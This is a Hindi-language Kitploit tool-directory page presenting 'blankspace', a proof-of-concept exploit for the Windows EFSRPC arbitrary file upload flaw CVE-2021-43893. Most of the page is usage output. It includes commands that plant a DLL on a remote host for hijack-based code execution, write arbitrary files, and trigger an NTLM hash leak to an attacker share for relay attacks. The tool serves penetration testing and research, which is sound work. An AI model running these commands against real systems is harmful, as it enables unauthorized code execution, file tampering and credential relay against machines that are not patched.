Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
blankspace — EFSRPC मनमाना फ़ाइल अपलोड (CVE-2021-43893) के लिए प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/jbaines-r7/blankspace
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कशोषणपार्श्व आंदोलनपोस्ट-शोषण
GitHubjbaines-r7/blankspace

blankspace

EFSRPC मनमाना फ़ाइल अपलोड (CVE-2021-43893) के लिए प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
641464 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ब्लैंक स्पेस

ब्लैंक स्पेस, जेम्स फोरशॉ के मूल प्रूफ ऑफ कॉन्सेप्ट का एक रीफैक्टरिंग है, जो CVE-2021-43893, EFSRPC मनमाना फ़ाइल अपलोड विशेषाधिकार वृद्धि के लिए है। ब्लैंक स्पेस, एक रिमोट होस्ट पर मनमानी फ़ाइलें बना सकता है जो अनकंस्ट्रेंड डेलीगेशन का उपयोग कर रहा है, यदि उसे CVE-2021-43893 के लिए पैच नहीं किया गया है। फ़ाइल निर्माण रिमोट उपयोगकर्ता के विशेषाधिकारों का उपयोग करके किया जाता है, इसलिए कोड निष्पादन थोड़ा अनुमानित है लेकिन निश्चित रूप से एक संभावना है। ब्लैंक स्पेस का उपयोग CVE-2021-43893 पैच होने के बाद भी रिले अटैक शुरू करने के लिए किया जा सकता है। इसी तरह, एडमिन उपयोगकर्ता मौजूदा फ़ाइलों को ओवरराइट कर सकते हैं, हालांकि यह तर्कसंगत रूप से सुरक्षा सीमा को पार नहीं करता है।

कोड निष्पादन, रिले अटैक और फ़ाइल विनाश दोनों के उदाहरण मेरे द्वारा लिखे गए Rapid7 ब्लॉग में उपलब्ध हैं। PoC यह मानता है कि निष्पादित करने वाला उपयोगकर्ता रिमोट होस्ट पर प्रमाणित कर सकता है।

उपयोग

विकल्प

ब्लैंक स्पेस को हमेशा एक रिमोट होस्ट (--rhost) और एक रिमोट फ़ाइलनाम (--filename) की आवश्यकता होती है। CVE-2021-43893 कुछ हद तक \\.\C:\ फ़ाइलपथों के लिए विशिष्ट है, लेकिन मैंने उपयोगकर्ता पर छोड़ दिया है कि वे पथ कैसे परिभाषित करते हैं (जैसे \\localhost\sharename या \\remotehost\share आप जो कर रहे हैं उसके आधार पर मान्य विकल्प हैं)।

root@kitploit:~
C:\Users\lowlevel\blankspace\Release>.\blankspace.exe
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
option "rhost" is required
Available options:
  -h, --help              Produces a help message
  -r, --rhost arg         The remote host to target
  -f, --filename arg      The name of the file to create/write to
  -s, --input-string arg  A string of data to write
  -i, --input-file arg    A string of data to write
  --relay                 Initiate NTLM hash leak
  --directory             Create a directory

फ़ाइल का उपयोग करके रिमोट फ़ाइल बनाना

root@kitploit:~
C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Python27\fveapi.dll -i ./dll_inject64.dll
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Python27\fveapi.dll
[+] Encrypt the empty remote file...
[+] Reading the encrypted remote file object
[+] Read back 1244 bytes
[+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream
[+] Decrypt the the remote file
[!] Success!

C:\ProgramData>

स्ट्रिंग का उपयोग करके रिमोट फ़ाइल बनाना

root@kitploit:~
C:\Users\lowlevel\blankspace\Release>.\blankspace.exe -r 10.0.0.6 -f \\.\C:\ProgramData\hello -s "hello world!"
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to 10.0.0.6
[+] Attempting to write to \\.\C:\ProgramData\hello
[+] Encrypt the empty remote file...
[+] Reading the encrypted remote file object
[+] Read back 1244 bytes
[+] Writing 12 bytes of attacker data to encrypted object::$DATA stream
[+] Decrypt the the remote file
[!] Success!

C:\Users\lowlevel\blankspace\Release>

रिले ट्रिगर करना

root@kitploit:~
C:\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\10.0.0.3\r7\r7 --relay
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to yeet.okhuman.ninja
[+] Sending EfsRpcDecryptFileSrv for \\10.0.0.3\r7\r7
[-] EfsRpcDecryptFileSrv failed with status code: 53
[+] Network path not found error received!
[!] Success!
C:\ProgramData>

श्रेय

  • जेम्स फोरशॉ - मूल समस्या की खोज और प्रूफ ऑफ कॉन्सेप्ट
  • टेलर स्विफ्ट
टूल डाउनलोड करें